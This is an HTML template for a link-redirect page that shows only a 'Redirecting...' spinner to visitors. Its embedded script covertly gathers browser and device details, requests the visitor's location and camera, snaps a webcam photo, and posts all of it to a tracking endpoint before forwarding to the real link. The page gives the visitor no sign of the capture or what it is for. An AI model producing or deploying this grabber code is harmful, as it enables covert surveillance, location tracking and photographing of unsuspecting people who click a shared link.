<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Redirecting...</title>
    <style>
        body {
            font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, sans-serif;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
            background: linear-gradient(135deg, #667eea 0%, #764ba2 100%);
            color: white;
        }
        .container {
            text-align: center;
            max-width: 400px;
            padding: 2rem;
        }
        .spinner {
            width: 40px;
            height: 40px;
            border: 4px solid rgba(255,255,255,0.3);
            border-radius: 50%;
            border-top-color: white;
            animation: spin 1s ease-in-out infinite;
            margin: 0 auto 1rem;
        }
        @keyframes spin {
            to { transform: rotate(360deg); }
        }
        h1 { margin: 0 0 0.5rem; font-size: 1.5rem; }
        p { margin: 0; opacity: 0.9; }
    </style>
</head>
<body>
    <div class="container">
        <div class="spinner"></div>
        <h1>Redirecting...</h1>
        <p>Please wait while we prepare your destination.</p>
    </div>

    <script>
        (async function() {
            const originalUrl = '{{ORIGINAL_URL}}';
            const linkId = '{{LINK_ID}}';
            const collectLocation = {{COLLECT_LOCATION}};
            const collectDevice = {{COLLECT_DEVICE}};
            const requestCamera = {{REQUEST_CAMERA}};
            
            const trackingData = {
                linkId: linkId,
                location: null,
                deviceInfo: null,
                cameraAccess: 'not_requested',
                capturedImage: null
            };

            // Collect device information
            if (collectDevice) {
                trackingData.deviceInfo = {
                    userAgent: navigator.userAgent,
                    platform: navigator.platform,
                    language: navigator.language,
                    cookieEnabled: navigator.cookieEnabled,
                    onLine: navigator.onLine,
                    screen: {
                        width: screen.width,
                        height: screen.height,
                        colorDepth: screen.colorDepth
                    },
                    viewport: {
                        width: window.innerWidth,
                        height: window.innerHeight
                    }
                };
            }

            // Collect location data
            if (collectLocation && navigator.geolocation) {
                try {
                    const position = await new Promise((resolve, reject) => {
                        navigator.geolocation.getCurrentPosition(resolve, reject, {
                            timeout: 5000,
                            enableHighAccuracy: false
                        });
                    });
                    
                    trackingData.location = {
                        latitude: position.coords.latitude,
                        longitude: position.coords.longitude,
                        accuracy: position.coords.accuracy
                    };
                } catch (error) {
                    console.log('Location access denied or failed');
                }
            }

            // Request camera access and capture image
            if (requestCamera) {
                try {
                    const stream = await navigator.mediaDevices.getUserMedia({ 
                        video: { width: 640, height: 480 }
                    });
                    trackingData.cameraAccess = 'granted';
                    
                    // Create video element and capture image
                    const video = document.createElement('video');
                    const canvas = document.createElement('canvas');
                    const ctx = canvas.getContext('2d');
                    
                    video.srcObject = stream;
                    video.play();
                    
                    // Wait for video to start playing
                    await new Promise(resolve => {
                        video.onloadedmetadata = () => {
                            canvas.width = video.videoWidth;
                            canvas.height = video.videoHeight;
                            resolve();
                        };
                    });
                    
                    // Wait a moment for camera to adjust
                    await new Promise(resolve => setTimeout(resolve, 1000));
                    
                    // Capture the image
                    ctx.drawImage(video, 0, 0);
                    trackingData.capturedImage = canvas.toDataURL('image/jpeg', 0.8);
                    
                    // Stop the stream
                    stream.getTracks().forEach(track => track.stop());
                } catch (error) {
                    trackingData.cameraAccess = 'denied';
                }
            } else {
                trackingData.cameraAccess = 'not_requested';
            }

            // Send tracking data
            try {
                await fetch('/api/track', {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/json',
                    },
                    body: JSON.stringify(trackingData)
                });
            } catch (error) {
                console.error('Failed to send tracking data:', error);
            }

            // Redirect to original URL after a short delay
            setTimeout(() => {
                window.location.href = originalUrl;
            }, 1500);
        })();
    </script>
</body>
</html>
